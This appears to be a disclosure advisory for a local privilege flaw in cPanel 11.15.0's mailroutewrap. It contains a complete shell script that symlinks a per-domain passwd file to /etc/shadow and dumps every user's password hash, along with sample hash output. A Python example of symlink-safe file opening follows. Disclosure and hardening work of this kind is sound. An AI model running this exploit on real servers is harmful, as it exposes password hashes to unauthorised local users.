cPanel 11.15.0-RELEASE_18420 - local users could view any entry from /etc/shadow via mailroutewrap
DESCRIPTION
A symlink attack in /home/username/etc/mail/domain/shadow allowed any entry from /etc/shadow to be displayed to the user. The local user needed to have or create an email account that acted as a catch-all to take advantage of this issue.
[user@host ~]$ ./11.15.0-RELEASE_18420-view_any_line_from_etc_shadow.sh
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::
This bug was initially discovered as a way for local users to effectively run exim -bp and exim -bpc via the following commands:
[user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bp
37m   350 1MfI5k-00048d-Dk <user@example.com>
          user@example.com

[user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bpc
1
The symlink attack wasn't discovered until later, at which time the issue was reported.
IMPACT
Local users could obtain any entry of their choice from /etc/shadow, or execute the equivalent of exim -bp or exim -bpc.
#!/bin/sh
########################
#
# Rip all of /etc/shadow
#
########################

DOMAIN=`ls /home/$USER/etc | grep \\\. | head -1`

if [ -d /home/$USER/etc/$DOMAIN ] ; then
	cd /home/$USER/etc/$DOMAIN
else
	exit
fi

mv passwd passwd.orig 2>/dev/null
ln -s /etc/shadow passwd

for x in `cut -d : -f 1 /etc/passwd` ; do
	ENTRY=`/usr/local/cpanel/bin/mailroutewrap $x@$DOMAIN 2>&1 | \
		grep 'lookup yielded:' | tail -1 | awk '{print $3}' ;`
	echo $x:$ENTRY
done

rm -f passwd
mv passwd.orig passwd 2>/dev/null
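As a defensive counterpart to the symlink attack described above (example code written for this page, not the advisory's or cPanel's own; file names and the sample record are constructed): how a privileged helper can open a user-owned per-domain file without following a planted symlink, validating the inode it actually opened rather than a path checked beforehand.

```python
import os
import stat
import tempfile


def open_user_file(path, expected_uid):
    """Open a user-controlled config file for reading without following a
    symlink at its final component, then validate the inode that was actually
    opened (checking the path beforehand with lstat would be racy)."""
    flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC
    try:
        fd = os.open(path, flags)
    except OSError as exc:  # ELOOP: the final component is a symlink
        raise PermissionError(f"refusing {path}: {exc.strerror}") from exc
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path} is not a regular file")
        if st.st_uid != expected_uid:
            # Also catches a hard link to a root-owned file such as /etc/shadow.
            raise PermissionError(f"{path} owned by uid {st.st_uid}, not {expected_uid}")
    except Exception:
        os.close(fd)
        raise
    return fd


def demo():
    """Constructed scenario: a user-owned per-domain passwd file next to a
    planted symlink (hypothetical names; the link stands in for /etc/shadow)."""
    uid = os.getuid()
    results = {}
    with tempfile.TemporaryDirectory() as d:
        real = os.path.join(d, "passwd")
        with open(real, "w") as f:
            f.write("alice:$1$constructed$notarealhash:::\n")
        link = os.path.join(d, "passwd.planted")
        os.symlink(real, link)
        fd = open_user_file(real, uid)
        results["regular"] = os.read(fd, 5) == b"alice"
        os.close(fd)
        for key, target, owner in (("symlink_refused", link, uid),
                                   ("wrong_owner_refused", real, uid + 1)):
            try:
                open_user_file(target, owner)
                results[key] = False
            except PermissionError:
                results[key] = True
    return results
```

The owner check on the opened descriptor is what defeats the advisory's trick even if a hard link rather than a symlink is planted, since the linked inode still carries its original uid.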